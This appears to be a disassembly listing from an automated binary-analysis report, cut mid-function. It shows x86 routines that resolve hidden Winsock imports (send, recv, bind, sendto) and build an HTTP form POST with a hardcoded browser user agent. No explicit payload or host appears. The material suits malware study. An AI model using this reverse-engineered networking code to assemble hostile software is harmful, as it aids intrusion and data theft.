00407978 push ebx xrefs 00422000, 00429E90
00407979 mov ebx, eax
0040797B mov eax, ebx
0040797D call 00407910h
00407982 inc eax
00407983 setne al
00407986 pop ebx
00407987 ret function end
Function 00407A4C, API count: 1, instr count: 49
APIs
  • GetDiskFreeSpaceA.KERNEL32, ref: 00407A6D
Address Instruction Meta Information
00407A4C push ebp
00407A4D mov ebp, esp
00407A4F add esp, FFFFFFE8h
00407A52 push ebx
00407A53 mov eax, dword ptr [ebp+08h]
00407A56 test eax, eax
00407A58 jne 00407A5Ch
00407A5A xor eax, eax
00407A5C lea edx, dword ptr [ebp-10h] xrefs 00407A58
00407A5F push edx
00407A60 lea edx, dword ptr [ebp-0Ch]
00407A63 push edx
00407A64 lea edx, dword ptr [ebp-08h]
00407A67 push edx
00407A68 lea edx, dword ptr [ebp-04h]
00407A6B push edx
00407A6C push eax
00407A6D call 00406194h GetDiskFreeSpaceA@KERNEL32.DLL (Hidden Import)
00407A72 mov ebx, eax
00407A74 mov eax, dword ptr [ebp-04h]
00407A77 imul dword ptr [ebp-08h]
00407A7A xor edx, edx
00407A7C mov dword ptr [ebp-18h], eax
00407A7F mov dword ptr [ebp-14h], edx
00407A82 mov eax, dword ptr [ebp-0Ch]
00407A85 xor edx, edx
00407A87 push edx
00407A88 push eax
00407A89 mov eax, dword ptr [ebp-18h]
00407A8C mov edx, dword ptr [ebp-14h]
00407A8F call 00405068h
00407A94 mov ecx, dword ptr [ebp+0Ch]
00407A97 mov dword ptr [ecx], eax
00407A99 mov dword ptr [ecx+04h], edx
00407A9C mov eax, dword ptr [ebp-10h]
00407A9F xor edx, edx
00407AA1 push edx
00407AA2 push eax
00407AA3 mov eax, dword ptr [ebp-18h]
00407AA6 mov edx, dword ptr [ebp-14h]
00407AA9 call 00405068h
00407AAE mov ecx, dword ptr [ebp+10h]
00407AB1 mov dword ptr [ecx], eax
00407AB3 mov dword ptr [ecx+04h], edx
00407AB6 mov eax, ebx
00407AB8 pop ebx
00407AB9 mov esp, ebp
00407ABB pop ebp
00407ABC retn 0010h function end
Function 00418890, API count: 0, instr count: 31
Address Instruction Meta Information
00418890 push ebp
00418891 mov ebp, esp
00418893 push ecx
00418894 push ebx
00418895 push esi
00418896 mov dword ptr [ebp-04h], edx
00418899 mov ebx, eax
0041889B mov eax, dword ptr [ebp-04h]
0041889E call 00404868h
004188A3 xor eax, eax
004188A5 push ebp
004188A6 push 004188DDh
004188AB push dword ptr fs:[eax]
004188AE mov dword ptr fs:[eax], esp
004188B1 mov esi, dword ptr [ebp-04h]
004188B4 mov eax, dword ptr [ebp-04h]
004188B7 call 00404678h
004188BC mov ecx, eax
004188BE mov edx, esi
004188C0 mov eax, ebx
004188C2 mov ebx, dword ptr [eax]
004188C4 call dword ptr [ebx+1Ch]
004188C7 xor eax, eax
004188C9 pop edx
004188CB pop ecx Count = 2
004188CC mov dword ptr fs:[eax], edx
004188CF push 004188E4h
004188D4 lea eax, dword ptr [ebp-04h] xrefs 004188E2
004188D7 call 004043DCh
004188DC ret function end
Function 00413AD8, API count: 1, instr count: 12
APIs
  • send.WS2_32, ref: 00413AE3
Address Instruction Meta Information
00413AD8 push ebp xrefs 004187BD, 004187FA
00413AD9 mov ebp, esp
00413ADB push ebx
00413ADC mov ebx, dword ptr [ebp+08h]
00413ADF push ebx
00413AE0 push ecx
00413AE1 push edx
00413AE2 push eax
00413AE3 call dword ptr [0042B400h] send@WS2_32.DLL (Hidden Import)
00413AE9 pop ebx
00413AEA pop ebp
00413AEB retn 0004h function end
Function 00421A91, API count: 0, instr count: 9
Strings
  • p B, va: 00420924
Address Instruction Meta Information
00421A91 sub eax, 0042CA94h
00421A96 add dword ptr [ebx+16h], esi
00421A99 call 0041F43Ch
00421A9E test al, al
00421AA0 je 00421AAFh
00421AA2 mov eax, dword ptr [0042B97Ch] 0042B5D8
00421AA7 mov edx, dword ptr [00420924h] ASCII "p B"
00421AAD mov dword ptr [eax], edx
00421AAF ret xrefs 00421AA0 function end
Function 0040F480, API count: 1, instr count: 30
APIs
  • RtlDeleteCriticalSection.NTDLL, ref: 0040F4A3
Address Instruction Meta Information
0040F480 push ebp
0040F481 mov ebp, esp
0040F483 xor eax, eax
0040F485 push ebp
0040F486 push 0040F4EFh
0040F48B push dword ptr fs:[eax]
0040F48E mov dword ptr fs:[eax], esp
0040F491 inc dword ptr [0042C818h]
0040F497 jne 0040F4E1h
0040F499 call 0040F124h
0040F49E push 0042C820h
0040F4A3 call 00406114h RtlDeleteCriticalSection@NTDLL.DLL (Hidden Import)
0040F4A8 mov eax, 0042C81Ch
0040F4AD mov edx, dword ptr [0040F100h] 0040F104
0040F4B3 call 00405254h
0040F4B8 mov eax, 0042B348h
0040F4BD mov ecx, 00000015h
0040F4C2 mov edx, dword ptr [00401040h] 00401044
0040F4C8 call 00404D40h
0040F4CD mov eax, 0042B33Ch
0040F4D2 call 004043DCh
0040F4D7 mov eax, 0042C7F8h
0040F4DC call 0040DB20h
0040F4E1 xor eax, eax xrefs 0040F497
0040F4E3 pop edx
0040F4E5 pop ecx Count = 2
0040F4E6 mov dword ptr fs:[eax], edx
0040F4E9 push 0040F4F6h
0040F4EE ret xrefs 0040F4F4 function end
Function 0040C4E0, API count: 0, instr count: 29
Address Instruction Meta Information
0040C4E0 push ebp
0040C4E1 mov ebp, esp
0040C4E3 xor eax, eax
0040C4E5 push ebp
0040C4E6 push 0040C548h
0040C4EB push dword ptr fs:[eax]
0040C4EE mov dword ptr fs:[eax], esp
0040C4F1 sub dword ptr [0042C788h], 01h
0040C4F8 jnc 0040C53Ah
0040C4FA mov eax, 0040C090h
0040C4FF call 00404104h
0040C504 mov eax, 0040C17Ch
0040C509 call 0040412Ch
0040C50E cmp byte ptr [0042C65Dh], 00000000h
0040C515 je 0040C526h
0040C517 mov eax, 0042B150h
0040C51C mov edx, 0040C55Ch
0040C521 call 00404430h
0040C526 call 0040AF84h xrefs 0040C515
0040C52B call 0040B088h
0040C530 call 0040BC0Ch
0040C535 call 0040B7C0h
0040C53A xor eax, eax xrefs 0040C4F8
0040C53C pop edx
0040C53E pop ecx Count = 2
0040C53F mov dword ptr fs:[eax], edx
0040C542 push 0040C54Fh
0040C547 ret xrefs 0040C54D function end
Function 004139D8, API count: 1, instr count: 13
APIs
  • bind.WS2_32, ref: 004139E8
Address Instruction Meta Information
004139D8 push ebx xrefs 0041840F
004139D9 push esi
004139DA mov ebx, edx
004139DC mov esi, eax
004139DE mov eax, ebx
004139E0 call 0041399Ch
004139E5 push eax
004139E6 push ebx
004139E7 push esi
004139E8 call dword ptr [0042B43Ch] bind@WS2_32.DLL (Hidden Import)
004139EE pop esi
004139EF pop ebx
004139F0 ret function end
Function 0041803C, API count: 0, instr count: 102
Address Instruction Meta Information
0041803C push ebp xrefs 004183E5, 004184F6
0041803D mov ebp, esp
00418047 push 00000000h Count = 5
00418049 push ebx
0041804A push esi
0041804B push edi
0041804C mov dword ptr [ebp-04h], ecx
0041804F mov esi, edx
00418051 mov edi, eax
00418053 mov eax, dword ptr [ebp-04h]
00418056 call 00404868h
0041805B mov eax, dword ptr [ebp+08h]
0041805E call 00404868h
00418063 xor eax, eax
00418065 push ebp
00418066 push 00418174h
0041806B push dword ptr fs:[eax]
0041806E mov dword ptr fs:[eax], esp
00418071 push dword ptr [ebp-04h]
00418074 push 0041818Ch
00418079 push dword ptr [ebp+08h]
0041807C lea eax, dword ptr [ebp-08h]
0041807F mov edx, 00000003h
00418084 call 00404738h
00418089 mov ecx, dword ptr [ebp-08h]
0041808C xor edx, edx
0041808E mov eax, edi
00418090 call 00419E70h
00418095 mov eax, edi
00418097 call 0041949Ch
0041809C xor ebx, ebx
0041809E cmp dword ptr [edi+000001B4h], FFFFFFFFh
004180A5 jne 004180D0h
004180A7 cmp byte ptr [edi+0000008Ch], 00000000h
004180AE jne 004180D0h
004180B0 mov eax, dword ptr [ebp-04h]
004180B3 call 00415F18h
004180B8 test al, al
004180BA je 004180C0h
004180BC mov bl, 01h
004180BE jmp 004180D6h
004180C0 mov eax, dword ptr [ebp-04h] xrefs 004180BA
004180C3 call 00415FD8h
004180C8 test al, al
004180CA je 004180D6h
004180CC mov bl, 02h
004180CE jmp 004180D6h
004180D0 mov bl, byte ptr [edi+0000008Ch] xrefs 004180A5, 004180AE
004180D6 mov edx, ebx xrefs 004180CA, 004180CE, 004180BE
004180D8 mov eax, edi
004180DA call 00417D4Ch
004180DF push eax
004180E0 mov eax, edi
004180E2 mov edx, dword ptr [eax]
004180E4 call dword ptr [edx+000000A4h]
004180EA push eax
004180EB mov eax, edi
004180ED mov edx, dword ptr [eax]
004180EF call dword ptr [edx+000000A0h]
004180F5 push eax
004180F6 mov al, byte ptr [edi+0000008Fh]
004180FC push eax
004180FD mov eax, esi
004180FF mov ecx, dword ptr [ebp+08h]
00418102 mov edx, dword ptr [ebp-04h]
00418105 call 00413D24h
0041810A mov dword ptr [edi+000001B8h], eax
00418110 lea ecx, dword ptr [ebp-10h]
00418113 mov edx, esi
00418115 mov eax, edi
00418117 call 00418190h
0041811C push dword ptr [ebp-10h]
0041811F push 0041818Ch
00418124 mov edx, esi
00418126 mov eax, edi
00418128 call 004181B8h
0041812D lea edx, dword ptr [ebp-14h]
00418130 call 004074CCh
00418135 push dword ptr [ebp-14h]
00418138 lea eax, dword ptr [ebp-0Ch]
0041813B mov edx, 00000003h
00418140 call 00404738h
00418145 mov ecx, dword ptr [ebp-0Ch]
00418148 mov dl, 01h
0041814A mov eax, edi
0041814C call 00419E70h
00418151 xor eax, eax
00418153 pop edx
00418155 pop ecx Count = 2
00418156 mov dword ptr fs:[eax], edx
00418159 push 0041817Bh
0041815E lea eax, dword ptr [ebp-14h] xrefs 00418179
00418161 mov edx, 00000005h
00418166 call 00404400h
0041816B lea eax, dword ptr [ebp+08h]
0041816E call 004043DCh
00418173 ret function end
Function 004044FC, API count: 1, instr count: 15
APIs
  • WideCharToMultiByte.KERNEL32, ref: 00404512
Address Instruction Meta Information
004044FC push ebp xrefs 004045A3, 00404573
004044FD mov ebp, esp
00404501 push 00000000h Count = 2
00404503 push edx
00404504 push eax
00404505 mov eax, dword ptr [ebp+08h]
00404508 push eax
00404509 push ecx
0040450A push 00000000h
0040450C mov eax, dword ptr [0042C5B8h] 00000003
00404511 push eax
00404512 call 004012C0h WideCharToMultiByte@KERNEL32.DLL (Hidden Import)
00404517 pop ebp
00404518 retn 0004h function end
Function 00422504, API count: 0, instr count: 31
Address Instruction Meta Information
00422504 push ebp xrefs 00429A73
00422505 mov ebp, esp
00422507 push 00000000h
00422509 xor eax, eax
0042250B push ebp
0042250C push 00422569h
00422511 push dword ptr fs:[eax]
00422514 mov dword ptr fs:[eax], esp
00422517 lea eax, dword ptr [ebp-04h]
0042251A call 00421DD8h
0042251F mov edx, dword ptr [ebp-04h]
00422522 mov eax, 0042DA84h
00422527 call 00404430h
0042252C xor ecx, ecx
0042252E mov dl, 01h
00422530 mov eax, dword ptr [00421AB0h] 00421AFC
00422535 call 00413184h
0042253A mov dword ptr [0042CAC4h], eax
0042253F mov eax, dword ptr [0042CAC4h] 009620F4
00422544 call 004134ECh
00422549 mov eax, dword ptr [0042CAC4h] 009620F4
0042254E call 0041351Ch
00422553 xor eax, eax
00422555 pop edx
00422557 pop ecx Count = 2
00422558 mov dword ptr fs:[eax], edx
0042255B push 00422570h
00422560 lea eax, dword ptr [ebp-04h] xrefs 0042256E
00422563 call 004043DCh
00422568 ret function end
Function 00413AF0, API count: 1, instr count: 12
APIs
  • recv.WS2_32, ref: 00413AFB
Address Instruction Meta Information
00413AF0 push ebp xrefs 00418B17, 004193F4
00413AF1 mov ebp, esp
00413AF3 push ebx
00413AF4 mov ebx, dword ptr [ebp+08h]
00413AF7 push ebx
00413AF8 push ecx
00413AF9 push edx
00413AFA push eax
00413AFB call dword ptr [0042B404h] recv@WS2_32.DLL (Hidden Import)
00413B01 pop ebx
00413B02 pop ebp
00413B03 retn 0004h function end
Function 00429030, API count: 0, instr count: 97
Strings
  • application/x-www-form-urlencoded, va: 00429190
  • Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US), va: 004291BC
Address Instruction Meta Information
00429030 push ebp xrefs 00429285
00429031 mov ebp, esp
00429033 add esp, FFFFFFE8h
00429036 push ebx
00429037 push esi
00429038 push edi
00429039 xor ecx, ecx
0042903B mov dword ptr [ebp-18h], ecx
0042903E mov dword ptr [ebp-14h], ecx
00429041 mov dword ptr [ebp-08h], edx
00429044 mov dword ptr [ebp-04h], eax
00429047 mov eax, dword ptr [ebp-04h]
0042904A call 00404868h
0042904F xor eax, eax
00429051 push ebp
00429052 push 0042916Bh
00429057 push dword ptr fs:[eax]
0042905A mov dword ptr fs:[eax], esp
0042905D mov dl, 01h
0042905F mov eax, dword ptr [0040FD08h] 0040FD54
00429064 call 004036D8h
00429069 mov dword ptr [ebp-10h], eax
0042906C mov dl, 01h
0042906E mov eax, dword ptr [0041C8D0h] 0041C91C
00429073 call 0041CCB0h
00429078 mov dword ptr [ebp-0Ch], eax
0042907B xor eax, eax
0042907D push ebp
0042907E push 00429121h
00429083 push dword ptr fs:[eax]
00429086 mov dword ptr fs:[eax], esp
00429089 mov eax, dword ptr [ebp-0Ch]
0042908C mov eax, dword ptr [eax+1Ch]
0042908F mov dword ptr [eax+000001C8h], 00001388h
00429099 lea eax, dword ptr [ebp-14h]
0042909C mov ecx, dword ptr [0042DA84h] 009620CC
004290A2 mov edx, 00429184h
004290A7 call 004046C4h
004290AC mov eax, dword ptr [ebp-14h]
004290AF call 00404678h
004290B4 push eax
004290B5 lea eax, dword ptr [ebp-18h]
004290B8 mov ecx, dword ptr [0042DA84h] 009620CC
004290BE mov edx, 00429184h
004290C3 call 004046C4h
004290C8 mov edx, dword ptr [ebp-18h]
004290CB mov eax, dword ptr [ebp-0Ch]
004290CE mov eax, dword ptr [eax+30h]
004290D1 pop ecx
004290D2 mov ebx, dword ptr [eax]
004290D4 call dword ptr [ebx+10h]
004290D7 mov eax, dword ptr [ebp-0Ch]
004290DA add eax, 34h
004290DD mov edx, 00429190h ASCII "application/x-www-form-urlencoded"
004290E2 call 00404430h
004290E7 mov eax, dword ptr [ebp-0Ch]
004290EA add eax, 60h
004290ED mov edx, 004291BCh ASCII "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US)"
004290F2 call 00404430h
004290F7 push 00000001h
004290F9 mov ecx, dword ptr [ebp-04h]
004290FC mov edx, 004291F4h
00429101 mov eax, dword ptr [ebp-0Ch]
00429104 call 0041D0E8h
00429109 mov eax, dword ptr [ebp-0Ch]
0042910C mov edx, dword ptr [eax+30h]
0042910F mov eax, dword ptr [ebp-10h]
00429112 mov ecx, dword ptr [eax]
00429114 call dword ptr [ecx+6Ch]
00429117 xor eax, eax
00429119 pop edx
0042911B pop ecx Count = 2
0042911C mov dword ptr fs:[eax], edx
0042911F jmp 0042912Bh
0042912B mov dl, 01h xrefs 0042911F
0042912D mov eax, dword ptr [ebp-0Ch]
00429130 mov ecx, dword ptr [eax]
00429132 call dword ptr [ecx-04h]
00429135 mov edx, dword ptr [ebp-08h]
00429138 mov eax, dword ptr [ebp-10h]
0042913B mov ecx, dword ptr [eax]
0042913D call dword ptr [ecx+1Ch]
00429140 mov eax, dword ptr [ebp-10h]
00429143 call 00403708h
00429148 xor eax, eax
0042914A pop edx
0042914C pop ecx Count = 2
0042914D mov dword ptr fs:[eax], edx
00429150 push 00429172h
00429155 lea eax, dword ptr [ebp-18h] xrefs 00429170
00429158 mov edx, 00000002h
0042915D call 00404400h
00429162 lea eax, dword ptr [ebp-04h]
00429165 call 004043DCh
0042916A ret function end
Function 0041351C, API count: 3, instr count: 59
APIs
    • InterlockedExchange.KERNEL32, ref: 00412FB7
  • PeekMessageA.USER32, ref: 00413556
  • MsgWaitForMultipleObjects.USER32, ref: 0041356B
  • GetExitCodeThread.KERNEL32, ref: 004135A3
Address Instruction Meta Information
0041351C push ebx xrefs 0042254E, 00413281
0041351D push esi
0041351E add esp, FFFFFFD8h
00413521 mov esi, eax
00413523 mov eax, dword ptr [esi+04h]
00413526 mov dword ptr [esp+04h], eax
0041352A call 00406184h
0041352F mov edx, dword ptr [0042B984h] 0042C030
00413535 cmp eax, dword ptr [edx]
00413537 jne 00413591h
00413539 xor ebx, ebx
0041353B mov eax, dword ptr [0042C848h] 00000048
00413540 mov dword ptr [esp+08h], eax
00413544 cmp ebx, 02h xrefs 0041358D
00413547 jne 0041355Bh
0041354F push 00000000h Count = 4
00413551 lea eax, dword ptr [esp+1Ch]
00413555 push eax
00413556 call 004062DCh PeekMessageA@USER32.DLL (Hidden Import)
0041355B push 00000040h xrefs 00413547
0041355D push 000003E8h
00413562 push 00000000h
00413564 lea eax, dword ptr [esp+10h]
00413568 push eax
00413569 push 00000002h
0041356B call 004062D4h MsgWaitForMultipleObjects@USER32.DLL (Hidden Import)
00413570 mov ebx, eax
00413572 cmp ebx, FFFFFFFFh
00413575 setne dl
00413578 mov eax, esi
0041357A call 00413344h
0041357F cmp ebx, 01h
00413582 jne 0041358Bh
00413584 xor eax, eax
00413586 call 00412F3Ch
0041358B test ebx, ebx xrefs 00413582
0041358D jne 00413544h
0041358F jmp 0041359Dh
00413591 push FFFFFFFFh xrefs 00413537
00413593 mov eax, dword ptr [esp+08h]
00413597 push eax
00413598 call 0040629Ch
0041359D push esp xrefs 0041358F
0041359E mov eax, dword ptr [esp+08h]
004135A2 push eax
004135A3 call 0040619Ch GetExitCodeThread@KERNEL32.DLL (Hidden Import)
004135A8 cmp eax, 01h
004135AB sbb edx, edx
004135AD inc edx
004135AE mov eax, esi
004135B0 call 00413344h
004135B5 mov eax, dword ptr [esp]
004135B8 add esp, 28h
004135BB pop esi
004135BC pop ebx
004135BD ret function end
Function 00402F94, API count: 1, instr count: 31
APIs
  • SetFilePointer.KERNEL32, ref: 00402FB1
Address Instruction Meta Information
00402F94 push ebx xrefs 00402F7E
00402F95 push esi
00402F96 mov ebx, eax
00402F98 mov ax, word ptr [ebx+04h]
00402F9C cmp ax, 0000D7B0h
00402FA0 jbe 00402FCFh
00402FA2 cmp ax, 0000D7B3h
00402FA6 jnbe 00402FCFh
00402FA8 push 00000001h
00402FAC push 00000000h Count = 2
00402FAE mov eax, dword ptr [ebx]
00402FB0 push eax
00402FB1 call 004011E8h SetFilePointer@KERNEL32.DLL (Hidden Import)
00402FB6 mov esi, eax
00402FB8 cmp esi, FFFFFFFFh
00402FBB jne 00402FC4h
00402FBD call 00402820h
00402FC2 jmp 00402FDCh
00402FC4 mov eax, esi xrefs 00402FBB
00402FC6 xor edx, edx
00402FC8 div dword ptr [ebx+08h]
00402FCB mov esi, eax
00402FCD jmp 00402FDCh
00402FCF mov eax, 00000067h xrefs 00402FA0, 00402FA6
00402FD4 call 00402810h
00402FD9 or esi, FFFFFFFFh
00402FDC mov eax, esi xrefs 00402FCD, 00402FC2
00402FDE pop esi
00402FDF pop ebx
00402FE0 ret function end
Function 004052B8, API count: 1, instr count: 13
APIs
  • VirtualQuery.KERNEL32, ref: 004052C3
Address Instruction Meta Information
004052B8 add esp, FFFFFFE4h xrefs 00410318
004052BB push 0000001Ch
004052BD lea edx, dword ptr [esp+04h]
004052C1 push edx
004052C2 push eax
004052C3 call 004012C8h VirtualQuery@KERNEL32.DLL (Hidden Import)
004052C8 cmp dword ptr [esp+10h], 00001000h
004052D0 jne 004052D8h
004052D2 mov eax, dword ptr [esp+04h]
004052D6 jmp 004052DAh
004052D8 xor eax, eax xrefs 004052D0
004052DA add esp, 1Ch xrefs 004052D6
004052DD ret function end
Function 00404268, API count: 2, instr count: 71
APIs
  • FreeLibrary.KERNEL32, ref: 004042ED
    • GetStdHandle.KERNEL32, ref: 00404215
    • WriteFile.KERNEL32, ref: 0040421B
    • MessageBoxA.USER32, ref: 00404254
  • ExitProcess.KERNEL32, ref: 00404322
Address Instruction Meta Information
00404268 push ebx xrefs 00404345
00404269 push esi
0040426A push edi
0040426B push ebp
0040426C mov ebx, 0042C630h
00404271 mov esi, 0042B000h
00404276 mov edi, 0042C040h
0040427B cmp byte ptr [ebx+28h], 00000000h
0040427F jne 00404297h
00404281 cmp dword ptr [edi], 00000000h
00404284 je 00404297h
00404286 mov edx, dword ptr [edi] xrefs 00404295
00404288 mov eax, edx
0040428A xor edx, edx
0040428C mov dword ptr [edi], edx
0040428E mov ebp, eax
00404290 call ebp
00404292 cmp dword ptr [edi], 00000000h
00404295 jne 00404286h
00404297 cmp dword ptr [0042B004h], 00000000h xrefs 0040427F, 00404284
0040429E je 004042B1h
004042A0 call 00404150h
004042A5 call 004041DCh
004042AA xor eax, eax
004042AC mov dword ptr [0042B004h], eax
004042B1 cmp byte ptr [ebx+28h], 00000002h xrefs 0040429E, 00404336
004042B5 jne 004042C1h
004042B7 cmp dword ptr [esi], 00000000h
004042BA jne 004042C1h
004042BC xor eax, eax
004042BE mov dword ptr [ebx+0Ch], eax
004042C1 call 00404004h xrefs 004042B5, 004042BA
004042C6 cmp byte ptr [ebx+28h], 00000001h
004042CA jbe 004042D1h
004042CC cmp dword ptr [esi], 00000000h
004042CF je 004042F2h
004042D1 mov eax, dword ptr [ebx+10h] xrefs 004042CA
004042D4 test eax, eax
004042D6 je 004042F2h
004042D8 call 00405888h
004042DD mov edx, dword ptr [ebx+10h]
004042E0 mov eax, dword ptr [edx+10h]
004042E3 cmp eax, dword ptr [edx+04h]
004042E6 je 004042F2h
004042E8 test eax, eax
004042EA je 004042F2h
004042EC push eax
004042ED call 00401238h FreeLibrary@KERNEL32.DLL (Hidden Import)
004042F2 call 00403FDCh xrefs 004042D6, 004042CF, 004042E6, 004042EA
004042F7 cmp byte ptr [ebx+28h], 00000001h
004042FB jne 00404300h
004042FD call dword ptr [ebx+24h]
00404300 cmp byte ptr [ebx+28h], 00000000h xrefs 004042FB
00404304 je 0040430Bh
00404306 call 004041ACh
0040430B cmp dword ptr [ebx], 00000000h xrefs 00404304
0040430E jne 00404327h
00404310 cmp dword ptr [0042C024h], 00000000h
00404317 je 0040431Fh
00404319 call dword ptr [0042C024h]
0040431F mov eax, dword ptr [esi] xrefs 00404317
00404321 push eax
00404322 call 00401218h ExitProcess@KERNEL32.DLL (Import)
00404327 mov eax, dword ptr [ebx] xrefs 0040430E
00404329 push esi
0040432A mov esi, eax
0040432C mov edi, ebx
0040432E mov ecx, 0000000Bh
00404333 rep movsd
00404335 pop esi
00404336 jmp 004042B1h
Function 004182FC, API count: 1, instr count: 35
APIs
  • closesocket.WS2_32, ref: 00418313
Address Instruction Meta Information
004182FC push ebx
004182FD push esi
004182FE mov esi, eax
00418300 mov eax, dword ptr [esi+000001B4h]
00418306 cmp eax, FFFFFFFFh
00418309 je 00418315h
0041830B push eax
0041830C mov eax, dword ptr [0042B958h] 0042B438
00418311 mov eax, dword ptr [eax]
00418313 call eax closesocket@WS2_32.DLL (Hidden Import)
00418315 mov dword ptr [esi+000001B4h], FFFFFFFFh xrefs 00418309
0041831F mov eax, dword ptr [esi+00000090h]
00418325 mov ebx, dword ptr [eax+08h]
00418328 dec ebx
00418329 cmp ebx, 00000000h
0041832C jl 00418346h
0041832E mov edx, ebx xrefs 00418344
00418330 mov eax, dword ptr [esi+00000090h]
00418336 call 004106B0h
0041833B call 00403708h
00418340 dec ebx
00418341 cmp ebx, FFFFFFFFh
00418344 jne 0041832Eh
00418346 mov eax, dword ptr [esi+00000090h] xrefs 0041832C
0041834C mov edx, dword ptr [eax]
0041834E call dword ptr [edx+08h]
00418351 mov al, byte ptr [esi+0000008Dh]
00418357 mov byte ptr [esi+0000008Ch], al
0041835D xor ecx, ecx
0041835F mov dl, 03h
00418361 mov eax, esi
00418363 call 00419E70h
00418368 pop esi
00418369 pop ebx
0041836A ret function end
Function 00413384, API count: 1, instr count: 73
APIs
    • SetEvent.KERNEL32, ref: 00412F1E
  • CreateEventA.KERNEL32, ref: 004133B3
Address Instruction Meta Information
00413384 push ebp xrefs 004134E0
00413385 mov ebp, esp
00413387 add esp, FFFFFFF4h
0041338A push ebx
0041338B mov dword ptr [ebp-04h], edx
0041338E call 00406184h
00413393 mov edx, dword ptr [0042B984h] 0042C030
00413399 cmp eax, dword ptr [edx]
0041339B jne 004133ABh
0041339D mov ebx, dword ptr [ebp-04h]
004133A0 mov eax, dword ptr [ebx+0Ch]
004133A3 call dword ptr [ebx+08h]
004133A6 jmp 004134BEh
004133AD push 00000000h Count = 2
004133AF push FFFFFFFFh
004133B1 push 00000000h
004133B3 call 00406104h CreateEventA@KERNEL32.DLL (Hidden Import)
004133B8 mov dword ptr [ebp-08h], eax
004133BB xor eax, eax
004133BD push ebp
004133BE push 004134A6h
004133C3 push dword ptr fs:[eax]
004133C6 mov dword ptr fs:[eax], esp
004133C9 push 0042C860h
004133CE call 0040611Ch
004133D3 xor eax, eax
004133D5 push ebp
004133D6 push 00413488h
004133DB push dword ptr fs:[eax]
004133DE mov dword ptr fs:[eax], esp
004133E1 cmp dword ptr [0042B3C4h], 00000000h
004133E8 jne 004133FBh
004133EA mov dl, 01h
004133EC mov eax, dword ptr [0040FA48h] 0040FA94
004133F1 call 004036D8h
004133F6 mov dword ptr [0042B3C4h], eax
004133FB mov eax, dword ptr [ebp-04h] xrefs 004133E8
004133FE mov dword ptr [ebp-0Ch], eax
00413401 lea edx, dword ptr [ebp-0Ch]
00413404 mov eax, dword ptr [0042B3C4h] 00000000
00413409 call 00410574h
0041340E call 00412F18h
00413413 cmp word ptr [0042B3BEh], 0000h
0041341B je 0041342Eh
0041341D mov eax, dword ptr [ebp-0Ch]
00413420 mov edx, dword ptr [eax]
00413422 mov eax, dword ptr [0042B3C0h] 00000000
00413428 call dword ptr [0042B3BCh]
0041342E push 0042C860h xrefs 0041341B
00413433 call 0040623Ch
00413438 xor eax, eax
0041343A push ebp
0041343B push 00413469h
00413440 push dword ptr fs:[eax]
00413443 mov dword ptr fs:[eax], esp
00413446 push FFFFFFFFh
00413448 mov eax, dword ptr [ebp-08h]
0041344B push eax
0041344C call 0040629Ch
00413451 xor eax, eax
00413453 pop edx
00413455 pop ecx Count = 2
00413456 mov dword ptr fs:[eax], edx
00413459 push 00413470h
0041345E push 0042C860h xrefs 0041346E
00413463 call 0040611Ch
00413468 ret function end
004134BE pop ebx xrefs 004133A6, 004134B5
004134BF mov esp, ebp
004134C1 pop ebp
004134C2 ret function end
Function 00405350, API count: 1, instr count: 9
APIs
  • CharNextA.USER32, ref: 00405353
Address Instruction Meta Information
00405350 jmp 00405358h xrefs 00405433, 004053E7, 004053FA
00405352 push eax xrefs 00405361
00405353 call 00401200h CharNextA@USER32.DLL (Import)
00405358 mov dl, byte ptr [eax] xrefs 00405350
0040535A test dl, dl
0040535C je 00405363h
0040535E cmp dl, 0000005Ch
00405361 jne 00405352h
00405363 ret xrefs 0040535C function end
Function 0040451C, API count: 1, instr count: 13
APIs
  • MultiByteToWideChar.KERNEL32, ref: 0040452E
Address Instruction Meta Information
0040451C push ebp xrefs 00404B31, 00404B03
0040451D mov ebp, esp
0040451F push edx
00404520 push eax
00404521 mov eax, dword ptr [ebp+08h]
00404524 push eax
00404525 push ecx
00404526 push 00000000h
00404528 mov eax, dword ptr [0042C5B8h] 00000003
0040452D push eax
0040452E call 004012A0h MultiByteToWideChar@KERNEL32.DLL (Hidden Import)
00404533 pop ebp
00404534 retn 0004h function end
Function 00408C0C, API count: 1, instr count: 6
APIs
  • GetLocalTime.KERNEL32, ref: 00408C10
Address Instruction Meta Information
00408C0C add esp, FFFFFFF0h xrefs 00409A80, 00409CAB, 00409C70
00408C0F push esp
00408C10 call 004061B4h GetLocalTime@KERNEL32.DLL (Hidden Import)
00408C15 mov ax, word ptr [esp]
00408C19 add esp, 10h
00408C1C ret function end
Function 00413B08, API count: 1, instr count: 32
APIs
  • sendto.WS2_32, ref: 00413B3A
Address Instruction Meta Information
00413B08 push ebp xrefs 00419CA2
00413B09 mov ebp, esp
00413B0B add esp, FFFFFFE4h
00413B0E push ebx
00413B0F push esi
00413B10 push edi
00413B11 mov esi, dword ptr [ebp+08h]
00413B14 lea edi, dword ptr [ebp-1Ch]
00413B17 push ecx
00413B18 mov ecx, 00000007h
00413B1D rep movsd
00413B1F pop ecx
00413B20 mov edi, ecx
00413B22 mov esi, edx
00413B24 mov ebx, eax
00413B26 lea eax, dword ptr [ebp-1Ch]
00413B29 call 0041399Ch
00413B2E push eax
00413B2F lea eax, dword ptr [ebp-1Ch]
00413B32 push eax
00413B33 mov eax, dword ptr [ebp+0Ch]
00413B36 push eax
00413B37 push edi
00413B38 push esi
00413B39 push ebx
00413B3A call dword ptr [0042B3FCh] sendto@WS2_32.DLL (Hidden Import)
00413B40 pop edi
00413B41 pop esi
00413B42 pop ebx
00413B43 mov esp, ebp
00413B45 pop ebp
00413B46 retn 0008h function end
Function 0040B7C0, API count: 0, instr count: 201
Strings
  • m/d/yy, va: 0040BAAC
  • mmmm d, yyyy, va: 0040BABC
  • :mm, va: 0040BB24
  • :mm:ss, va: 0040BB30
  • AMPM , va: 0040BB14
  • AMPM, va: 0040BB04
Address Instruction Meta Information
0040B7C0 push ebp xrefs 0040C535
0040B7C1 mov ebp, esp
0040B7C3 mov ecx, 00000008h
0040B7CA push 00000000h Count = 2
0040B7CC dec ecx
0040B7CD jne 0040B7C8h
0040B7CF push ebx
0040B7D0 xor eax, eax
0040B7D2 push ebp
0040B7D3 push 0040BA8Bh
0040B7D8 push dword ptr fs:[eax]
0040B7DB mov dword ptr fs:[eax], esp
0040B7DE call 0040B64Ch
0040B7E3 call 0040A1BCh
0040B7E8 cmp byte ptr [0042C744h], 00000000h
0040B7EF je 0040B7F6h
0040B7F1 call 0040A394h
